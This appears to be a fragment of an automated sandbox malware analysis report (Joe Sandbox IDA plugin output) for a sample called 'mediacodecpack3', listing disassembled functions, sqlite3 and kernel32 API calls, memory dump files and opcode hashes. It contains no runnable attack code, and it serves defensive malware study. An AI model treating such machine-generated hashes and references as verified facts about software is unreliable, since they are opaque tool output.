                                                                                            • API ID: sqlite3_strnicmp
                                                                                            • String ID: SQLITE_
                                                                                            • API String ID: 1961171630-787686576
                                                                                            • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                            • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                            • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                            • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                            APIs
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                            • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                            Strings
                                                                                            • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID: Invalid argument to rtreedepth()
                                                                                            • API String ID: 1063208240-2843521569
                                                                                            • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                            • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                            • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                            • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                            APIs
                                                                                            • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                              • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                              • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                              • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                              • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                            • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: soft_heap_limit
                                                                                            • API String ID: 1251656441-405162809
                                                                                            • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                            • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                            • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                            • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                            APIs
                                                                                            • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                            • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: NULL
                                                                                            • API String ID: 632333372-324932091
                                                                                            • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                            • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                            • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                            • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                            APIs
                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404608
                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040463C
                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404656
                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040466D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3499195154-0
                                                                                            • Opcode ID: 89e6c41d760d97d5fcc59a371cb6f4e80e60aa6d464a71aa99f6417c7b537c35
                                                                                            • Instruction ID: 2adbec297c34dc3d5fc58a6281b1bdaad71761cfda4098cfa9d0d345734132fa
                                                                                            • Opcode Fuzzy Hash: 89e6c41d760d97d5fcc59a371cb6f4e80e60aa6d464a71aa99f6417c7b537c35
                                                                                            • Instruction Fuzzy Hash: 2D114C70250701DFD7308F28EE85E127BB5F7867207108B3DEAA1E25E0D7359845CB08
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeavefree
                                                                                            • String ID:
                                                                                            • API String ID: 4020351045-0
                                                                                            • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                            • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                                                            • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                            • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                            • String ID:
                                                                                            • API String ID: 682475483-0
                                                                                            • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                            • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                            • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                            • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2